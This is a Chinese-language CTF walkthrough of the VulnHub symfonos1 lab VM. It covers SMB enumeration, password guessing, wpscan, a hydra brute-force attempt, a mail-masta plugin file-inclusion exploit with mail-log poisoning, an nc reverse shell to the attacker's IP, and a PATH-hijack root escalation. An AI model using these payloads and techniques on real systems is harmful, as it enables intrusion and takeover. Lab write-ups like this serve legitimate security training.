主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/symfonos/symfonos1.7z

用到的知识点:
SMB使用
wpscan
本地文件包含和写邮件getshell
修改环境变量提权

发现IP


IP为10.0.3.150

nmap

SMB

直接使用SMB协议,使用anonymous用户登录

发现一个文件

我猜有人用了这些密码
还发现一个用户


试一下用上面的密码登录下helios

smbclient //10.0.3.150/helios --user=helios

最后用了qwerty进来了

全部get下来读一下


根据他说的work on /h3l105 我就去web下访问了,结果真有

wordpress兄弟,上wpscan 这里插一句,站点会解析到symfonos.local中, 我们在/etc/hosts的文件中修改一下(不改也行,就是访问的慢一些)

wpscan

wpscan --url http://10.0.3.150/h3l105 --wp-content-dir -ep -et -eu


找到一个用户,是admin
我爆破一下(没暴破出来)

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.0.3.150

扫插件

wpscan --url http://symfonos.local/h3l105 --enumerate p

找到两个插件

去查一下有没有漏洞

有个本地文件包含

通过我们的实际插件地址去访问

后面拼接参数,发现漏洞存在

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

getshell

发现可以读本地文件,那如果要getshell,我们就需要能写进去一些什么,现在想到25端口是开着的,一定有用,那就用写邮件的方式去写文件进去。
先看一下我们能不能读邮件

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios


可以读,那接下来开始写邮件

已经收到邮件

执行shell

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=id


我们弹个shell回来

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=nc%2010.0.3.141%20443%20-e%20/bin/bash


变个好用的shell

'import pty;pty.spawn("/bin/sh")'

提权

sudo -l了一下没东西
然后

find / -perm -u=s -type f 2>/dev/null


找到一个奇怪的程序,我们把他放在web目录下,然后下下来
本地strings一下

发现一个curl命令,没有加绝对路径,我们想办法去修改环境变量
先下一个rootshell过来,



然后编译他(这时候我在web目录下(var/www/html),因为这里我有写权限)

gcc rootshell.c -o curl


然后把这里加到环境变量的最前边

执行程序

获得root

OSCP - symfonos writeup相关推荐

  1. oscp——symfonos:3

    0x00 前言 这个是练习的第6个机子. 目标地址 https://www.vulnhub.com/entry/symfonos-3,332/ 参考文章 https://www.wandouip.co ...

  2. OSCP - Raven writeup

    主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/raven/Raven.ova 用到的知识点: wpscan漏扫 hydra暴破 john ...

  3. OSCP 2021攻略之旅--从小白到通过

    1.背景 本文提供给0基础小白,指导其如何学习通过OSCP. 本人CS硕士毕业,毕业后加入一家网络安全公司一直做传统网络安全产品研发工作(FW/IDS/IPS/WAF/scanner).现任谋厂研究员 ...

  4. Ichunqiu云境 —— Exchange Writeup

    Ichunqiu云境 -- Exchange Writeup Author:小离-xiaoli 0x00 Intro OSCP 渗透风格,脱离C2和MSF之类的工具 Box 难度不高 0x01 Inf ...

  5. 【原创】Ichunqiu云境 —— Endless(无间计划) Writeup

    Ichunqiu云境 -- Endless(无间计划) Writeup Author:小离-xiaoli 0x00 Intro 前言: 两个入口点,一个入口点是pboot-cms,另外一个是SQL注入 ...

  6. 2021年中国工业互联网安全大赛核能行业赛道writeup之usb流量分析

    目录 一.USB协议 二.键盘流量 三.鼠标流量 四.writeup 附件题:usb流量分析 题目描述: 具体描述忘记了o(╯□╰)o 大概意思是有个U盘插到电脑上,然后经过一些操作导致该电脑重启了. ...

  7. 2021年中国工业互联网安全大赛核能行业赛道writeup之鱿鱼游戏

    目录 一.尝试 二.Writeup 附加题 鱿鱼游戏(来自最近一部很火的韩剧) 题目描述: 小王由于操作不规范,误将不明U盘插入到上位机中,导致上位机中的某些关键文件被加密,但攻击者在U盘中还留下了一 ...

  8. 2018湖湘杯海选复赛Writeup

    2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...

  9. php upload ctf,强网杯CTF防御赛ez_upload Writeup

    这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家. ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型 ...

最新文章

  1. C/C++中的复数介绍
  2. mysql根据bin log恢复_MySQL 通过 binlog 恢复数据
  3. cenos下安装MySQL最新版(5.7.18)记录。附卸载老版本过程
  4. **bootstrap常见常用样式总结
  5. js reduce数组循环相加x+y
  6. Hibernate第十一篇【配置C3P0数据库连接池、线程Session】
  7. MPMoviePlayerController属性,方法,通知整理
  8. Session Cookie 之我见
  9. 软件编码测试要点总结
  10. 怎么用计算机拨号手机,手机怎么连接电脑拨号打电话
  11. 2018年11月中旬香港, 吉隆坡8天游记
  12. 免费公开课:讲解DevExpress 2016.2新版本功能
  13. 全球运输工业的升级会带来什么
  14. opencv怎么找到手指最高处
  15. 硬盘安装windows系统
  16. 服务器的1U、2U、4U是指什么?
  17. 【D2Det】《 D2Det:Towards High Quality Object Detection and Instance Segmentation》
  18. cdr文件太大怎么转成小内存 CDR文件太大打不开怎么办
  19. 怎么知道一个日期是一年中的第几周?
  20. 【R 数据科学】R语言进行数据科学整理最有用的包大全

热门文章

  1. 图文一步步详细描述刷机Mobile 6.5 的过程(内涵6700、6750、6800、6900刷机工具及驱动)...
  2. Android SoftAP 实现框架
  3. html字体间距标签,css中字体间距怎么调?
  4. Python:图书管理系统
  5. Unity向量的点乘和叉乘的使用
  6. 应用商店成恶意APP滋生新温床 190款感染应用让你措不及防
  7. 前端和后端哪个工资高?做前端好还是做后端好?
  8. 百度地图实时监听缩放级别
  9. https://mp.weixin.qq.com/s/j7YdtmyuzBFRK1BViDtp2w
  10. 几所大学新增计算机相关专业研究生招生